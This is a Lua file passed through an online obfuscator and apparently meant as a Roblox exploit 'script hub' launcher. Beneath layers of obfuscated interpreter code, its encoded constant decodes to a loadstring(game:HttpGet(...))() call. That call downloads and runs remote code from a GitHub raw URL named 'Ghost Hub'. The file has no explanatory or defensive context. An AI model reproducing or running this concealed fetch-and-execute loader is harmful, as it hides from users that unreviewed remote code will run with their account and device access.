--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=v2(v0(v30,16));if v19 then local v119=v5(v87,v19);v19=nil;return v119;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -(3 + 0))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((883 -263) -(555 + 64)))) + (932 -((1922 -(68 + 997)) + (1344 -(226 + 1044)))))) ;return v88-(v88%(569 -(367 + 201))) ;else local v89=927 -(214 + 713) ;local v90;while true do if (v89==0) then v90=(1 + (4 -3))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (878 -(282 + 595))) or ((1754 -(32 + 85)) -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==(2 -(2 -1))) then return (v41 * (31011612 -14234396)) + (v40 * ((218240 -97928) -(39871 + 14905))) + (v39 * 256) + v38 ;end if (v37==(350 -(87 + 263))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 4 ;v37=953 -(802 + (1147 -(915 + 82))) ;end end end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + 0 ,26 -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v42 ;local v46=v20(v43,21,67 -36 );local v47=((v20(v43,6 + 26 )==(1 -0)) and  -(1 + 0 + 0)) or ((1564 -(201 + 571)) -((1506 -(116 + 1022)) + 423)) ;if (v46==0) then if (v45==(0 -0)) then return v47 * ((74 -56) -(10 + 8)) ;else local v120=0 -0 ;while true do if (v120==(442 -(416 + 26))) then v46=(2 + 1) -(7 -5) ;v44=0;break;end end end elseif (v46==(879 + 1168)) then return ((v45==(0 -0)) and (v47 * ((439 -((514 -369) + 293))/((1289 -(814 + 45)) -(44 + 386))))) or (v47 * NaN) ;end return v8(v47,v46-(2509 -(998 + 488)) ) * (v44 + (v45/(2^(17 + 35)))) ;end local function v25(v48) local v49;if  not v48 then local v91=0 -0 ;while true do if (v91==(0 + (885 -(261 + 624)))) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v67=1, #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0 + 0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92== #"}") then if (v93== #"~") then v94=(function() return v95()~=(1905 -(1881 + 24)) ;end)();elseif (v93==(4 -2)) then v94=(function() return v96();end)();elseif (v93~= #"gha") then else v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if (v92~=(1763 -(454 + 1309))) then else local v126=(function() return 0 + 0 ;end)();while true do if (v126==1) then v92=(function() return  #"~";end)();break;end if (v126~=(0 -0)) then else v93=(function() return v95();end)();v94=(function() return nil;end)();v126=(function() return 1;end)();end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v52=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 0;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do local v118=(function() return 0;end)();while true do if (v118~=0) then else if ((1 -0)==v109) then local v129=(function() return 0 -0 ;end)();while true do if (0~=v129) then else while true do if (v100==(285 -(134 + 151))) then v101=(function() return v102();end)();if (v103(v101, #"!", #">")==(1665 -(970 + 695))) then local v145=(function() return 0;end)();local v146=(function() return;end)();local v147=(function() return;end)();local v148=(function() return;end)();local v149=(function() return;end)();while true do if (v145==0) then v146=(function() return 0 -0 ;end)();v147=(function() return nil;end)();v145=(function() return 1;end)();end if (v145==(1991 -(582 + 1408))) then local v150=(function() return 0;end)();while true do if (v150~=(3 -2)) then else v145=(function() return 2 -0 ;end)();break;end if (v150~=(0 -0)) then else v148=(function() return nil;end)();v149=(function() return nil;end)();v150=(function() return 1;end)();end end end if ((1826 -(1195 + 629))==v145) then while true do if (v146~=2) then else local v151=(function() return 0 -0 ;end)();local v152=(function() return;end)();while true do if (v151~=(241 -(187 + 54))) then else v152=(function() return 0;end)();while true do if ((780 -(162 + 618))==v152) then if (v103(v148, #"|", #"~")== #"[") then v149[2 + 0 ]=(function() return v104[v149[2]];end)();end if (v103(v148,2,2 + 0 )== #",") then v149[ #"91("]=(function() return v104[v149[ #"19("]];end)();end v152=(function() return 1;end)();end if (v152==(1 -0)) then v146=(function() return  #"xxx";end)();break;end end break;end end end if (v146== #">") then local v153=(function() return 0;end)();while true do if (v153~=(1 -0)) then else v146=(function() return 1 + 1 ;end)();break;end if ((1636 -(1373 + 263))==v153) then v149=(function() return {v105(),v105(),nil,nil};end)();if (v147==0) then local v158=(function() return 0 + 0 ;end)();local v159=(function() return;end)();while true do if (v158==(0 -0)) then v159=(function() return 0;end)();while true do if (v159==0) then v149[ #"-19"]=(function() return v105();end)();v149[ #"?id="]=(function() return v105();end)();break;end end break;end end elseif (v147== #"\\") then v149[ #"19("]=(function() return v106();end)();elseif (v147==(2 -0)) then v149[ #"19("]=(function() return v106() -((1386 -(746 + 638))^(7 + 9)) ;end)();elseif (v147== #"xxx") then local v166=(function() return 0;end)();local v167=(function() return;end)();while true do if (v166~=(0 -0)) then else v167=(function() return 0;end)();while true do if (v167==0) then v149[ #"xnx"]=(function() return v106() -(2^16) ;end)();v149[ #"http"]=(function() return v105();end)();break;end end break;end end end v153=(function() return 342 -(218 + 123) ;end)();end end end if (v146== #"19(") then if (v103(v148, #"xxx", #"gha")== #"|") then v149[ #"0313"]=(function() return v104[v149[ #".com"]];end)();end v107[v108]=(function() return v149;end)();break;end if (v146==0) then local v155=(function() return 1581 -(1535 + 46) ;end)();local v156=(function() return;end)();while true do if (v155==(0 + 0)) then v156=(function() return 0;end)();while true do if (v156==0) then v147=(function() return v103(v101,1 + 1 , #"xxx");end)();v148=(function() return v103(v101, #"0313",6);end)();v156=(function() return 1;end)();end if (1~=v156) then else v146=(function() return  #",";end)();break;end end break;end end end end break;end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end if (v109==(560 -(306 + 254))) then local v130=(function() return 0;end)();local v131=(function() return;end)();while true do if (v130==(0 + 0)) then v131=(function() return 0;end)();while true do if (1~=v131) then else v109=(function() return 1 -0 ;end)();break;end if ((1467 -(899 + 568))~=v131) then else v100=(function() return 0;end)();v101=(function() return nil;end)();v131=(function() return 1 + 0 ;end)();end end break;end end end break;end end end end;end)();local v53=(function() return function(v110,v111,v112) local v113=(function() return 0 -0 ;end)();local v114=(function() return;end)();while true do if (v113==0) then v114=(function() return 603 -(268 + 335) ;end)();while true do if (v114==0) then v110[v111-#"\\" ]=(function() return v112();end)();return v110,v111,v112;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #" ",v58 do FlatIdent_2BD95,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_2BD95,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"91("]=(function() return v21();end)();for v70= #"}",v23() do FlatIdent_60EA1,Descriptor,v21,v20,v59,v22,v23,v54,v70=(function() return v52(FlatIdent_60EA1,Descriptor,v21,v20,v59,v22,v23,v54,v70);end)();end for v71= #"/",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[291 -(60 + (1487 -(1043 + 214))) ];local v65=v61[574 -(426 + (551 -405)) ];local v66=v61[1 + 2 ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=(1213 -(323 + 889)) + 0 ;local v77= -(1457 -(282 + 1174));local v78={};local v79={...};local v80=v12("#",...) -(812 -(569 + 242)) ;local v81={};local v82={};for v115=0 -0 ,v80 do if ((v115>=v74) or (3283>=4535)) then v78[v115-v74 ]=v79[v115 + 1 + 0 ];else v82[v115]=v79[v115 + 1 ];end end local v83=(v80-v74) + (2 -1) + 0 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1025 -(706 + 318) ];if (v85<=(1253 -(721 + 530))) then if (v85<=(1271 -(945 + 326))) then v82[v84[4 -2 ]]=v84[3 + 0 ];elseif (v85==(585 -(57 + 527))) then v82[v84[702 -(271 + 429) ]]=v63[v84[(583 -(361 + 219)) + 0 ]];else local v135=v84[1502 -(1408 + 92) ];v82[v135]=v82[v135](v82[v135 + (1087 -(461 + 625)) ]);end elseif ((18<=2112) and (v85<=(1292 -(993 + (615 -(53 + 267)))))) then if ((1097<=1628) and (v85==3)) then local v137;v82[v84[2]]={};v76=v76 + (1 -0) ;v84=v72[v76];v82[v84[2]]=v63[v84[1 + 2 ]];v76=v76 + (167 -(122 + 44)) ;v84=v72[v76];v82[v84[2]]=v84[(266 + 908) -(418 + 753) ];v76=v76 + 1 ;v84=v72[v76];v137=v84[1 + (414 -(15 + 398)) ];v82[v137]=v82[v137](v82[v137 + 1 ]);v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[1 + 1 ]]();v76=v76 + 1 + 0 ;v84=v72[v76];do return;end else v82[v84[3 -1 ]]();end elseif (v85>(2 + 3)) then v82[v84[531 -(406 + 123) ]]={};else do return;end end v76=v76 + ((2752 -(18 + 964)) -(1749 + 20)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!023Q00030A3Q006C6F6164737472696E6703793Q006C6F6164737472696E672867616D653A482Q74704765742822682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696E536372697074733335322F4D61696E536372697074733335322F726566732F68656164732F6D61696E2F47686F7374253230487562222Q29282900064Q00037Q00122Q000100013Q00122Q000200026Q0001000200024Q0001000100016Q00017Q00",v9(),...);
